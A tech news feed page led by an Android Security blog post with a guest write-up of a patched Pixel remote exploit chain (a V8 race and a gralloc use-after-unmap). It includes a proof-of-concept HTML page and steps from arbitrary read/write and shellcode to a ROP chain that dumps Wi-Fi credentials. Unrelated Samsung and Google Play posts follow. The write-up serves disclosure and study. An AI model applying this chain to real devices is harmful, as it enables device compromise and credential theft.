
Latest Tech Feeds to Keep You Updated…

Android Security Ecosystem Investments Pay Dividends for Pixel

Posted by Mayank Jain and Scott Roberts of the Android Security team

In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, the highest reward in the history of the ASR program, plus $7,500 from the Chrome Rewards program, for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with a security patch level of 2017-12-05 or later are protected from these issues.

All Pixel devices and partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation.

The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in the Android Security Rewards program, check out our program rules. For tips on how to submit reports, see Bug Hunter University.

The following article is a guest blog post authored by Guang Gong of Alpha Team, Qihoo 360 Technology Co. Ltd.

Technical details of a Pixel remote exploit chain

The Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process.

This blog post covers the technical details of the exploit chain, which includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug used to gain remote code execution in Chrome's sandboxed render process. CVE-2017-14904 is a bug in Android's libgralloc module used to escape Chrome's sandbox. Together, the two bugs allow arbitrary code to be injected into system_server when a malicious URL is opened in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys).

The RCE bug (CVE-2017-5116)

New features usually bring new bugs. V8 6.0 introduced support for SharedArrayBuffer, a low-level mechanism for sharing memory between JavaScript workers and synchronizing control flow across them. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that runs in modern web browsers: a low-level assembly-like language with a compact binary format that runs with near-native performance and gives languages such as C/C++ a compilation target for the web. By combining three features in Chrome (SharedArrayBuffer, WebAssembly, and web workers), an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. While the main thread parses the WebAssembly code, the worker thread can modify it at the same time, which causes an OOB access.

The buggy code is in the function GetFirstArgumentAsBytes, where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer was introduced to JavaScript, a TypedArray may be backed by a SharedArrayBuffer, so the contents of the TypedArray may be modified by other worker threads at any time.

i::wasm::ModuleWireBytes GetFirstArgumentAsBytes(
    const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) {
  ......
  } else if (source->IsTypedArray()) {    //--->source should be checked if it's backed by a SharedArrayBuffer
    // A TypedArray was passed.
    Local<TypedArray> array = Local<TypedArray>::Cast(source);
    Local<ArrayBuffer> buffer = array->Buffer();
    ArrayBuffer::Contents contents = buffer->GetContents();
    start =
        reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset();
    length = array->ByteLength();
  } 
  ......
  return i::wasm::ModuleWireBytes(start, start + length);
}

A simple PoC is as follows:

<html>
<h1>poc</h1>
<script id="worker1">
worker:{
       self.onmessage = function(arg) {
        console.log("worker started");
        var ta = new Uint8Array(arg.data);
        var i =0;
        while(1){
            if(i==0){
                i=1;
                ta[51]=0;   //--->4)modify the webassembly code at the same time
            }else{
                i=0;
                ta[51]=128;
            }
        }
    }
}
</script>
<script>
function getSharedTypedArray(){
    var wasmarr = [
        0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
        0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03,
        0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e,
        0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65,
        0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01,
        0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b,
        0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b];
    var sb = new SharedArrayBuffer(wasmarr.length);           //---> 1)put WebAssembly code in a SharedArrayBuffer
    var sta = new Uint8Array(sb);
    for(var i=0;i<sta.length;i++)
        sta[i]=wasmarr[i];
    return sta;    
}
var blob = new Blob([
        document.querySelector('#worker1').textContent
        ], { type: "text/javascript" })

var worker = new Worker(window.URL.createObjectURL(blob));   //---> 2)create a web worker
var sta = getSharedTypedArray();
worker.postMessage(sta.buffer);                              //--->3)pass the WebAssembly code to the web worker
setTimeout(function(){
        while(1){
        try{
        sta[51]=0;
        var myModule = new WebAssembly.Module(sta);          //--->4)parse the WebAssembly code
        var myInstance = new WebAssembly.Instance(myModule);
        //myInstance.exports.getAnswerPlus1();
        }catch(e){
        }
        }
    },1000);

//worker.terminate(); 
</script>
</html>

The text format of the WebAssembly code is as follows:

00002b func[0]:
00002d: 41 2a                      | i32.const 42
00002f: 0b                         | end
000030 func[1]:
000032: 10 00                      | call 0
000034: 41 01                      | i32.const 1
000036: 6a                         | i32.add
000037: 0b                         | end

First, the binary-format WebAssembly code above is put into a SharedArrayBuffer, and a TypedArray object is created using the SharedArrayBuffer as its buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly code, the worker thread modifies the SharedArrayBuffer at the same time. Under this circumstance, the race condition causes a TOCTOU issue: after the main thread's bounds check, the instruction "call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs.

Because the "call 0" WebAssembly instruction can be modified to call any other WebAssembly function, the exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped into WebAssembly memory. Because function 0 and function $leak take different numbers of arguments, many useful pieces of data on the stack are leaked.

 (func $leak(param i32 i32 i32 i32 i32 i32)(result i32)
    i32.const 0
    get_local 0
    i32.store
    i32.const 4
    get_local 1
    i32.store
    i32.const 8
    get_local 2
    i32.store
    i32.const 12
    get_local 3
    i32.store
    i32.const 16
    get_local 4
    i32.store
    i32.const 20
    get_local 5
    i32.store
    i32.const 0
  ))

Not only the instruction "call 0" can be modified: any "call funcx" instruction can be. Assume funcx is a wasm function with six arguments, as follows. When V8 compiles funcx for the ia32 architecture, the first five arguments are passed through registers and the sixth is passed through the stack. All of the arguments can be set to arbitrary values from JavaScript:

/*Text format of funcx*/
 (func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32)
    get_local 5
    get_local 4
    i32.add)

/*Disassembly code of funcx*/
--- Code ---
kind = WASM_FUNCTION
name = wasm#1
compiler = turbofan
Instructions (size = 20)
0x58f87600     0  8b442404       mov eax,[esp+0x4]
0x58f87604     4  03c6           add eax,esi
0x58f87606     6  c20400         ret 0x4
0x58f87609     9  0f1f00         nop

Safepoints (size = 8)

RelocInfo (size = 0)

--- End code ---

When a JavaScript function calls a WebAssembly function, the V8 compiler creates a JS_TO_WASM function internally. After compilation, the JavaScript function calls the created JS_TO_WASM function, which in turn calls the WebAssembly function. JS_TO_WASM functions use a different calling convention: their first argument is passed through the stack. Suppose "call funcx" is modified to call the following JS_TO_WASM function:

/*Disassembly code of JS_TO_WASM function */
--- Code ---
kind = JS_TO_WASM_FUNCTION
name = js-to-wasm#0
compiler = turbofan
Instructions (size = 170)
0x4be08f20     0  55             push ebp
0x4be08f21     1  89e5           mov ebp,esp
0x4be08f23     3  56             push esi
0x4be08f24     4  57             push edi
0x4be08f25     5  83ec08         sub esp,0x8
0x4be08f28     8  8b4508         mov eax,[ebp+0x8]
0x4be08f2b     b  e8702e2bde     call 0x2a0bbda0  (ToNumber)    ;; code: BUILTIN
0x4be08f30    10  a801           test al,0x1
0x4be08f32    12  0f852a000000   jnz 0x4be08f62  <+0x42>

The JS_TO_WASM function will take the sixth argument of funcx as its first argument, but it treats that first argument as an object pointer, so a type confusion is triggered when the argument is passed to the ToNumber function: we can pass any value as an object pointer to ToNumber. So we can fake an ArrayBuffer object at some address, such as inside a double array, and pass that address to ToNumber. The layout of an ArrayBuffer is as follows:

/* ArrayBuffer layouts 40 Bytes*/                                                                                                                         
Map                                                                                                                                                       
Properties                                                                                                                                                
Elements                                                                                                                                                  
ByteLength                                                                                                                                                
BackingStore                                                                                                                                              
AllocationBase                                                                                                                                            
AllocationLength                                                                                                                                          
Fields                                                                                                                                                    
internal                                                                                                                                                  
internal                                                                                                                                                                                                                                                                                                      


/* Map layouts 44 Bytes*/                                                                                                                                   
static kMapOffset = 0,                                                                                                                                    
static kInstanceSizesOffset = 4,                                                                                                                          
static kInstanceAttributesOffset = 8,                                                                                                                     
static kBitField3Offset = 12,                                                                                                                             
static kPrototypeOffset = 16,                                                                                                                             
static kConstructorOrBackPointerOffset = 20,                                                                                                              
static kTransitionsOrPrototypeInfoOffset = 24,                                                                                                            
static kDescriptorsOffset = 28,                                                                                                                           
static kLayoutDescriptorOffset = 1,                                                                                                                       
static kCodeCacheOffset = 32,                                                                                                                             
static kDependentCodeOffset = 36,                                                                                                                         
static kWeakCellCacheOffset = 40,                                                                                                                         
static kPointerFieldsBeginOffset = 16,                                                                                                                    
static kPointerFieldsEndOffset = 44,                                                                                                                      
static kInstanceSizeOffset = 4,                                                                                                                           
static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5,                                                                                           
static kUnusedOffset = 6,                                                                                                                                 
static kVisitorIdOffset = 7,                                                                                                                              
static kInstanceTypeOffset = 8,     //one byte                                                                                                            
static kBitFieldOffset = 9,                                                                                                                               
static kInstanceTypeAndBitFieldOffset = 8,                                                                                                                
static kBitField2Offset = 10,                                                                                                                             
static kUnusedPropertyFieldsOffset = 11

Because the content of the stack can be leaked, we have plenty of useful data with which to fake the ArrayBuffer. For example, we can leak the start address of an object and calculate the start address of its elements, a FixedArray object, which we use as the faked ArrayBuffer's Properties and Elements fields. We also have to fake the ArrayBuffer's map; luckily, most of the map's fields are unused when the bug is triggered, but the InstanceType at offset 8 has to be set to 0xc3 (this value depends on the version of V8) to mark the object as an ArrayBuffer. To get a reference to the faked ArrayBuffer in JavaScript, we set the Prototype field of the map at offset 16 to an object whose Symbol.toPrimitive property is a JavaScript callback function. When the faked ArrayBuffer is passed to ToNumber to be converted to a Number, the callback is invoked, and inside the callback we obtain a reference to the faked ArrayBuffer. Because the ArrayBuffer is faked inside a double array, its contents can be set to arbitrary values, so changing the BackingStore and ByteLength fields of the faked ArrayBuffer yields arbitrary memory read and write. With arbitrary read/write, executing shellcode is simple: JIT code in Chrome is readable, writable, and executable, so we overwrite it to execute shellcode.

The Chrome team fixed this bug very quickly in Chrome 61.0.3163.79, just a week after I submitted the exploit.

The EoP Bug (CVE-2017-14904)

The sandbox escape bug is caused by a mismatch between map and unmap operations, which leads to a use-after-unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap:

static int gralloc_map(gralloc_module_t const* module,
                       buffer_handle_t handle)
{ ……
    private_handle_t* hnd = (private_handle_t*)handle;
    ……
    if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) &&
        !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) {
        size = hnd->size;
        err = memalloc->map_buffer(&mappedAddress, size,
                                       hnd->offset, hnd->fd);        //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process.
        if(err || mappedAddress == MAP_FAILED) {
            ALOGE("Could not mmap handle %p, fd=%d (%s)",
                  handle, hnd->fd, strerror(errno));
            return -errno;
        }
        hnd->base = uint64_t(mappedAddress) + hnd->offset;          //---> save mappedAddress+offset to hnd->base
    } else {
        err = -EACCES;
}
……
    return err;
}

gralloc_map maps the graphic buffer described by the argument handle into memory, and gralloc_unmap unmaps it. While mapping, mappedAddress plus hnd->offset is stored in hnd->base; while unmapping, hnd->base is passed directly to munmap without subtracting the offset. Because hnd->offset can be manipulated from Chrome's sandboxed render process, it is possible to unmap arbitrary pages in system_server from that process.

static int gralloc_unmap(gralloc_module_t const* module,
                         buffer_handle_t handle)
{
  ……
    if(hnd->base) {
        err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset);    //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched.
        if (err) {
            ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base,
                    strerror(errno));
            return -errno;
        }
        hnd->base = 0;
}
……
    return 0;
}

int IonAlloc::unmap_buffer(void *base, unsigned int size,
        unsigned int /*offset*/)                              
//---> look, offset is not used by unmap_buffer
{
    int err = 0;
    if(munmap(base, size)) {
        err = -errno;
        ALOGE("ion: Failed to unmap memory at %p : %s",
              base, strerror(errno));
    }
    return err;
}

Although SELinux restricts the isolated_app domain from accessing most Android system services, isolated_app can still access three of them:

neverallow isolated_app {
    service_manager_type
    -activity_service
    -display_service
    -webviewupdate_service
}:service_manager find;

To trigger the aforementioned use-after-unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parcelable, into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered.

This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app. 

To exploit this EoP bug:

1. Address space shaping. Make the address space layout look as follows, with a heap chunk right above some contiguous ashmem mappings:

7f54600000-7f54800000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f54800000-7f54a00000 rw-s 001fe000 00:04 32783         /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781         /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779         /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777         /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775         /dev/ashmem/360alpha25 (deleted)
......

2. Unmap part of the heap (1 KB) and part of an ashmem memory (2MB–1KB) by triggering the bug:

7f54400000-7f54600000 rw-s 00000000 00:04 31603         /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
//--->There is a 2MB memory gap
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

3. Fill the unmapped space with an ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603      /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0         [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605       /dev/ashmem/360alpha1001 (deleted)  
//--->The gap is filled with the ashmem memory 360alpha1001
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783      /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781      /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779      /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777      /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775      /dev/ashmem/360alpha25 (deleted)

4. Spray the heap; the heap data will be written into the ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603        /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605          /dev/ashmem/360alpha1001 (deleted)
//--->the heap manager believes the memory range from 0x7f547ff000 to 0x7f54800000 is still managed by it and will allocate memory from this range, resulting in heap data being written to the ashmem memory
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

5. Because the ashmem mapped in step 3 is shared by both system_server and the render process, part of system_server's heap can now be read and written by the render process, and we can trigger system_server to allocate GraphicBuffer objects in that ashmem. As GraphicBuffer inherits from ANativeWindowBuffer, which has a member named common of type android_native_base_t, we can read two function pointers (incRef and decRef) from the ashmem memory and use them to calculate the base address of the module libui. On the latest Pixel device, Chrome's render process is still a 32-bit process while system_server is a 64-bit process, so we have to leak some module's base address to build a ROP chain. Now that we have the base address of libui, the last step is to trigger the ROP. Unluckily, the pointers incRef and decRef are apparently never called, so modifying them cannot divert control flow to the ROP chain; instead, we modify the virtual table of GraphicBuffer.

typedef struct android_native_base_t
{
    /* a magic value defined by the actual EGL native type */
    int magic;

    /* the sizeof() of the actual EGL native type */
    int version;

    void* reserved[4];

    /* reference-counting interface */
    void (*incRef)(struct android_native_base_t* base);
    void (*decRef)(struct android_native_base_t* base);
} android_native_base_t;

6. Trigger a GC to execute the ROP chain

When a GraphicBuffer object is destructed, the virtual function onLastStrongRef is called, so we replace this virtual function to jump into the ROP chain. When a GC happens, control flow transfers to the ROP chain. Finding a ROP chain within a single module (libui) is challenging, but after hard work we successfully found one and dumped the contents of the file /data/misc/wifi/wpa_supplicant.conf.

Summary

The Android security team responded quickly to our report and included fixes for these two bugs in the December 2017 security update. Supported Google devices and devices with a security patch level of 2017-12-05 or later address these issues. While parsing of untrusted parcels still happens in sensitive locations, the Android security team is working on hardening the platform to mitigate similar vulnerabilities.

The EoP bug was discovered through a joint effort between 360 Alpha Team and 360 C0RE Team. Many thanks for their efforts.

Samsung Electronics Unveils PyeongChang 2018 Olympic Games Limited Edition to Celebrate the Spirit of the Olympic Winter Games PyeongChang 2018

 

With less than a month to go until the Olympic Winter Games PyeongChang 2018, Samsung Electronics, Worldwide Olympic Partner in the Wireless Communications Equipment and Computing Equipment category, today unveiled the PyeongChang 2018 Olympic Games Limited Edition. To further extend its Olympic legacy of supporting athletes and the Olympic family, Samsung will provide the exclusive devices, a special edition of the Galaxy Note8, as encouragement to do bigger things at the Olympic Winter Games, while also helping maintain real-time connections and capturing and sharing memories with those near and far.

 

In collaboration with the International Olympic Committee (IOC) and the PyeongChang Organizing Committee for the 2018 Olympic & Paralympic Winter Games (POCOG), Samsung will deliver over 4,000 devices to all Olympians as well as the PyeongChang 2018 Olympic family allowing them to lean on Samsung mobile technology to enhance their experiences and connect more conveniently. The PyeongChang 2018 Olympic Games Limited Edition will include the bold new features of the Galaxy Note8, such as the innovative bezel-less 6.3-inch Infinity Display that fits comfortably in one hand, enhanced S Pen for efficient productivity, and Samsung’s best-in-class Dual Camera. Exclusively for the Games, the PyeongChang 2018 Olympic Games Limited Edition will showcase a shiny white back glass to celebrate the winter theme, and gold Olympic rings – inspired by the Olympic Torch – an expression of the Olympic Movement with the union of five continents, and unity worldwide.

 

“Throughout our 20-year legacy as an Olympic partner, Samsung has showcased our support of the Olympic Movement by helping spread the Olympic Spirit and enhance connections through our latest technological innovations and immersive experiences,” said Younghee Lee, CMO and Executive Vice President, Samsung Electronics. “We’re proud to provide the PyeongChang 2018 Olympic Games Limited Edition to all athletes in an effort to help them to stay connected, capture and share one of the most memorable moments of their lives.”

 

The PyeongChang 2018 Olympic Games Limited Edition will feature celebratory pre-loaded PyeongChang 2018 themed wallpapers, allowing recipients to stay connected in-style through Samsung’s most advanced mobile technology. As an added element, useful apps will be pre-installed to help cultivate the utmost Olympic Games experience.

 

“Samsung’s commitment to the Olympic Movement has increasingly enabled meaningful connections through innovative mobile technologies over the past 20 years,” said IOC President Thomas Bach. “Samsung’s creation of an Olympic Games Limited Edition device reinforces Samsung and IOC’s shared desire to spread the Olympic spirit. It’s because of dedicated partners like Samsung that we’re in the position to provide unforgettable experiences at the Olympic Games time after time.”

 

 

Samsung to Provide Galaxy Note8 to Paralympians

Displaying commitment to the Paralympic Movement, Samsung will provide smartphones to all Paralympians at the Paralympic Winter Games PyeongChang 2018. Each Paralympian will receive the Galaxy Note8 along with cases that feature the Paralympic Games logo and be exposed to how breakthrough mobile technologies can help make the digital world more accessible for those with disabilities. Samsung has been a World Paralympic Partner since the Olympic Winter Games Vancouver 2010 and an advocate for the Paralympic Movement striving to inspire the spirit of progress and the human challenge ever since.

 

About Samsung’s Involvement in the Olympic Games

Samsung began its Olympic Games involvement as a local sponsor of Olympic Games Seoul 1988. Beginning with Olympic Winter Games Nagano 1998, the company extended its commitment to the Olympic Movement as the Worldwide Olympic Partner in the Wireless Communications Equipment category, providing its proprietary wireless communications platform and mobile devices. These innovative mobile technologies provide the Olympic Community, athletes and fans around the world with interactive communications and information services, and Samsung Pay. Samsung hosts various Olympic campaigns to share the excitement of the Olympic Games with people around the world and enable everyone to participate in the Games through its innovative mobile technology. Samsung’s commitment as a Worldwide Olympic Partner continues through PyeongChang 2018, and Tokyo 2020 in the Wireless Communications Equipment and Computing Equipment category.

Meet the finalists of the Google Play Indie Games Contest in Europe

Posted by Adriana Puchianu, Developer Marketing Google Play

Back in October we launched the 2nd edition of the Google Play Indie Games Contest in Europe, with the aim of identifying, showcasing and rewarding indie gaming talent from more than 30 countries. We were amazed by the innovation and creativity that indie developers from the region have to offer.

Selecting just 20 finalists has once again been a huge challenge. We had a lot of fun playing the games that will be showcased at the Saatchi Gallery on February 13th in London. Without further ado, we are happy to announce the Top 20 finalists of this year's edition. Congratulations to the finalists, and thanks to everyone else who entered the contest.

A Planet of Mine
Tuesday Quest
France

Bridge Constructor Portal
ClockStone Softwareentwicklung GmbH
Austria

Bury me, my Love
Playdius
France

Captain Tom Galactic Traveler
Picodongames
France

Core
FURYJAM
Russia

Flat Pack
Nitrome
United Kingdom

Fern Flower
Macaque
Poland

I Love Hue
Zut!
United Kingdom

Jodeo
Gamebra.in
Turkey

Kami 2
State of Play
United Kingdom

Kenshō
FIFTYTWO
Russia

No More Buttons
Tommy Søreide Kjær
Norway

Old Man's Journey
Broken Rules Interactive Media GmbH
Austria

Radium 2 | Ra²
Developster
Germany

The Big Journey
Catfishbox
Ukraine

The House of Da Vinci
Blue Brain Games, s.r.o.
Slovakia

The Office Quest
11Sheep
Israel

Unbalance
TVEE
Turkey

Undervault
Andriy Bychkovskyi
Ukraine

yellow
Bart Bonte
Belgium

Check out the prizes

All 20 finalists receive:

  • A paid trip to London to showcase their game at the Final held at Saatchi Gallery
  • Inclusion of their game on a promotional billboard in London for 1 month
  • Inclusion of their game in a dedicated Indie Games Contest collection on the Indie Corner for one month in more than 40 countries across EMEA
  • Two (2) tickets to attend a 2018 Playtime event, an invitation-only event for top apps and games developers on Google Play
  • One (1) Pixel 2 device

They will also have the chance to win more prizes at the final event.

Join the Google Play team and the finalists at the final event:

Anyone can now register to attend the final showcase event for free at the Saatchi Gallery in London on 13 February 2018. Come and play some great games and have fun with indie developers, industry experts, and the Google Play team.

How useful did you find this blogpost?

Statement on French NGO’s allegations

Samsung deeply values the global network of employees at all of our manufacturing facilities who make it possible for us to deliver our products to our customers worldwide.

 

According to publicly available information, the new proceeding is based on the same allegations used in two previous proceedings initiated by Sherpa in 2013 and 2016, which were both closed in favor of Samsung.

 

We believe it is our responsibility to hold ourselves and our suppliers to the highest standards of labor practices while strictly complying with local labor regulations and international labor standards.

 

Samsung upholds a zero tolerance policy with regard to child labor, both in our own facilities and those of our suppliers.

Faster Renewals for Test Subscriptions

Testing your in-app subscriptions is a critical step in ensuring you're offering your customers a high quality service.

In order to make testing easier and faster, starting on February 20th, we are introducing shorter renewal intervals for test purchases made with license-test accounts. Currently, subscriptions by license-test accounts renew daily. The new changes will allow you to test an entire subscription cycle, including 6 renewals, in under an hour. We will also be shortening the testing time intervals of features such as grace period and account hold.

We are announcing these changes in advance so you can update your testing flows before they take effect. Also note that any test subscriptions still active on February 20, 2018 will automatically be canceled at that time.

Renewal times

Renewal times will vary based on the subscription period:

Subscription period    Test subscription period
1 week                 5 minutes
1 month                5 minutes
3 months               10 minutes
6 months               15 minutes
1 year                 30 minutes

Time intervals of the following features will also be shortened for test subscriptions:

Feature                          Test period
Free trial                       3 minutes
Introductory price period        Same as test subscription period
Grace period (3-day and 7-day)   5 minutes
Account hold                     10 minutes

Note: These times are approximate; you may see small variations in the precise time of an event. To account for this variation, call the Google Play Developer API to check a subscription's current status after each expiration date.

Renewal limit

Due to the increase in renewal frequency, the number of renewals is limited to 6 regular renewals (not including intro price/free trial). After 6 renewals, the subscription will be automatically canceled.
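Putting the renewal limit together with the renewal times above, a full test cycle is short. Here is a minimal C sketch that computes the approximate schedule; all names are illustrative and are not part of the Play Billing API:

```c
/* Approximate test renewal intervals in minutes, taken from the
 * renewal-times table above. Illustrative names only. */
struct test_interval {
    const char *subscription_period;
    int renewal_minutes;
};

static const struct test_interval kTestIntervals[] = {
    {"1 week",   5},
    {"1 month",  5},
    {"3 months", 10},
    {"6 months", 15},
    {"1 year",   30},
};

/* After 6 regular renewals the test subscription is canceled. */
enum { kMaxRegularRenewals = 6 };

/* Minutes from purchase until the nth regular renewal (1-based). */
int minutes_until_renewal(int renewal_minutes, int n) {
    return renewal_minutes * n;
}
```

For example, a 1-year test subscription renews roughly every 30 minutes, so `minutes_until_renewal(30, kMaxRegularRenewals)` is 180: the entire 6-renewal cycle completes in about 3 hours (remember that actual event times can vary slightly).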

Examples

Here are several examples of how the new renewal times are applied.

Free trial

Grace period

Account hold

Don't forget to check the Testing In-app Billing page for more details on testing your subscriptions. If you still have questions, reach out through the comments or post your question on Stack Overflow using the tag google-play.

Samsung Wins Best of KBIS 2018 Awards Across Two Categories

 

Samsung Electronics today announced that it has won two KBIS 2018 awards, presented by the Kitchen and Bath Industry Show (KBIS): the inaugural Smart Home Technology award and the Best of Kitchen Silver award.

 

The kitchen and bath industry’s premier awards program highlights the best new kitchen and bath products that push the boundaries of design, technology and innovation. Winners are selected based on innovation, design and function.

 

The Samsung Front Load Washer with QuickDrive™ is a major step forward in laundry innovation that cuts washing time. With faster wash cycles and enhanced smart capabilities, the washer's QuickDrive™ technology and intelligent Q-rator laundry assistant take the guesswork out of doing laundry from your mobile device. Intuitive features simplify the washing cycle: they provide automatic recommendations for optimal wash cycles, let you manage when a wash cycle will finish by adjusting cycle settings, and monitor the washer to keep it operating at optimal performance.

 

The Samsung FlexWash™ + FlexDry™ are a versatile new laundry pair that provide the ultimate flexibility to wash and dry multiple loads at the same time, so you can run multiple cycles at once and keep a wide variety of clothes in great condition.

 

This year, KBIS added new categories to recognize and honor brands at the forefront of smart home innovations which are driving the kitchen and bath innovations of tomorrow. A total of six awards were given out including Kitchen Gold and Silver, Bath Gold and Silver, Best in Show and the new Smart Home Technology award.

 

“We are proud to be the recipient of two KBIS awards this year, as it underscores Samsung’s dedication and commitment to bringing meaningful innovation to the home appliance industry and to consumers,” said Tom Halford, Vice President of Samsung Premium and Builder Brands. “Our combination of technology, performance and design is resonating strongly, and we are looking forward to a game-changing 2018.”

 

Following KBIS 2018, voting for the Best of KBIS People’s Choice award will take place online, via the KBIS Facebook page. Voting opens January 12, 2018, and show attendees can cast their vote for their favorite products. There will be three People’s Choice Winners (First, Second and Third Place).

 

Android Excellence: Congratulations to the newly added apps and games

Posted by Kacey Fahey, Developer Marketing, Google Play

Kicking off the new year, we're excited to welcome our latest group of Android Excellence apps and games. These awardees represent some of the best experiences and top performing apps and games on the Play Store and can be found with other great selections on the Editors' Choice page.

If you're looking for some new apps, below are a few highlights.

  • EyeEm: A great photo editor app with a full suite of filters and tools to make your pictures shine. Learn style tips from their community and even sell your images through the EyeEm marketplace.
  • Musixmatch: Check out Musixmatch's updated app while learning the lyrics to all your favorite songs. The app is compatible with many of the top music streaming services and you can even follow along with your Android Wear device or on the big screen with Chromecast support.
  • ViewRanger: Plan your next hiking adventure by discovering new routes and trail guides with ViewRanger. Check out the Skyline feature using your phone's camera to identify over 9 million sites across the world through augmented reality.

Here are a few of our favorite new games joining the collection.

  • Fire Emblem Heroes: Nintendo's popular strategy-RPG franchise is now reimagined for mobile. Fight battles, develop your heroes' skills, and try various gameplay modes for hours of exciting gameplay.
  • Lumino City: Explore the charming papercraft style world in this award-winning puzzle adventure game. The beautiful scenery is all handcrafted.
  • Old Man's Journey: Gorgeous scenery, an immersive soundtrack, and deep emotion help you uncover the old man's life stories while you solve puzzles and shape the landscape to determine his future.

Congratulations to the newly added Android Excellence apps and games.

New Android Excellence apps:
1tap, Acorns, Airbnb, Blink Health, Blinkist, Clue, Ditty, EyeEm, Fabulous, IFTTT, iReader, Journey, KKBOX, LinkedIn, Mobills: Budget Planner, Musixmatch, Shpock, Stocard, Video Editor, ViewRanger, YAZIO, YOP

New Android Excellence games:
Agent A, Bit Heroes, Bloons Supermonkey 2, Dancing Line, DEAD WARFARE: Zombie, Dragon Project, Fire Emblem Heroes, Futurama: Worlds of Tomorrow, Idle Heroes, Last Day on Earth: Survival, Lords Mobile, Lumino City, Modern Combat Versus, Old Man's Journey, The Walking Dead No Man's Land, War Wings

Explore other great apps and games in the Editors' Choice section on Google Play and discover best practices to help you build quality apps and games for people to love.


New Products At CES powered by Android Things

